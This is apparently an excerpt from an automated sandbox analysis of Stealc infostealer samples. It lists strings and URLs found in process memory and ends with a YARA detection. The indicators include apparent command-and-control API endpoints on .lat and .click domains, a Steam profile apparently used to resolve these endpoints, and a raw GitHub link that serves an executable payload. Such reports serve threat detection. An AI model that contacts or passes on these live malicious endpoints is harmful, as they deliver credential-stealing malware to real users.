                                    Source: powershell.exe, 0000001F.00000002.2276089201.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2315592782.0000000005151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBgq
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aspecteirs.lat/api
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1616651541.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616808855.0000000005F6F000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616331109.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB1E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2367759874.0000000001547000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612191991.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612630439.00000000007FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1616651541.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616808855.0000000005F6F000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616331109.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB1E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2367759874.0000000001547000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612191991.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612814549.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696500454657.12791&key=1696500454400500000.1&cta
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4886389394.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4897428890.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898729473.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4901441862.00000000009FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api0w
                                    Source: 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api7w
                                    Source: 696689ce6d.exe, 0000002F.00000002.4900783883.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api=
                                    Source: 696689ce6d.exe, 0000002F.00000003.4858982732.00000000009FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apil$w
                                    Source: 696689ce6d.exe, 0000002F.00000003.4886583987.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4900783883.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4859195796.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apilg
                                    Source: 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
                                    Source: 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/e
                                    Source: 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/o
                                    Source: 696689ce6d.exe, 0000002F.00000002.4901441862.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898372977.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886389394.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4897428890.00000000009FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/oN
                                    Source: 696689ce6d.exe, 0000002F.00000002.4901441862.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898372977.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886389394.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4897428890.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                                    Source: 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piOO
                                    Source: 696689ce6d.exe, 0000002F.00000003.4825063904.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4822742633.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/vo(
                                    Source: 696689ce6d.exe, 0000002F.00000003.4897375001.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858731214.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4905041657.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4822453760.000000000347F000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4824961540.000000000347F000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886283552.0000000003493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                                    Source: 696689ce6d.exe, 0000002F.00000003.4897375001.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858731214.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4905041657.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4838267197.000000000348C000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4838753795.000000000348C000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4846955753.0000000003491000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886283552.0000000003493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiCG
                                    Source: 696689ce6d.exe, 0000002F.00000003.4897375001.0000000003493000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4905041657.0000000003493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiDH
                                    Source: 696689ce6d.exe, 0000002F.00000003.4792947545.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apid
                                    Source: 696689ce6d.exe, 0000002F.00000003.4809217387.000000000347F000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809797067.0000000003482000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiion.txtPK
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacebudi.lat/api
                                    Source: powershell.exe, 0000001F.00000002.2281404457.0000000005B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2329195901.00000000061B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2725963665.00000173398E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2725963665.0000017339A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2538930366.000001732B202000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                    Source: 64252d274d.exe, 00000024.00000003.2315191387.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2601624574.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2422825618.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2389530571.0000000001504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/
                                    Source: 64252d274d.exe, 00000024.00000003.2340581903.0000000003A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/(
                                    Source: 64252d274d.exe, 00000024.00000003.2344378819.0000000003A5E000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2344227223.0000000003A57000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2344051395.0000000003A53000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/((
                                    Source: 64252d274d.exe, 00000024.00000003.2422825618.0000000003A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/3
                                    Source: 64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/E
                                    Source: 64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/H
                                    Source: 64252d274d.exe, 00000024.00000003.2340581903.0000000003A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/X
                                    Source: 64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2443015883.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2473087041.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2475086579.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2439674022.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2570767817.0000000001509000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2389530571.0000000001521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api
                                    Source: 64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api#
                                    Source: 64252d274d.exe, 00000024.00000003.2360817583.0000000003A5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api$
                                    Source: 64252d274d.exe, 00000024.00000003.2509524695.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2573407189.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2534701360.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2473087041.0000000001521000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2475086579.0000000001521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api1v
                                    Source: 64252d274d.exe, 00000024.00000003.2360817583.0000000003A5E000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2340581903.0000000003A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apiS
                                    Source: 64252d274d.exe, 00000024.00000003.2430484562.0000000001521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apibv
                                    Source: 64252d274d.exe, 00000024.00000003.2474220422.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2604304032.0000000003A63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/mv
                                    Source: 64252d274d.exe, 00000024.00000003.2474220422.0000000003A5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/mv4X
                                    Source: 64252d274d.exe, 00000024.00000003.2474220422.0000000003A5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/pi
                                    Source: 64252d274d.exe, 00000024.00000003.2315628481.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315517363.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315191387.00000000014AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/t
                                    Source: 64252d274d.exe, 00000024.00000003.2315628481.00000000014C9000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315517363.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2315191387.00000000014AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/y
                                    Source: 64252d274d.exe, 00000024.00000003.2474220422.0000000003A5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/api
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4886583987.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4847583445.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4847277082.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000002.4900783883.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4859195796.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/api
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/f
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat/z
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792947545.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rapeflowwj.lat:443/api
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000003092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                                    Source: cbfb8a9c89.exe, 0000001D.00000002.2462651359.0000000003092000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                                    Source: 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/W
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                                    Source: 696689ce6d.exe, 0000002F.00000003.4862231655.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4825063904.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4847052772.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886389394.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4822742633.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4849099979.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858982732.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900i(
                                    Source: 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/w
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792947545.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/

                                    System Summary

                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack, type: UNPACKEDPE Matched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
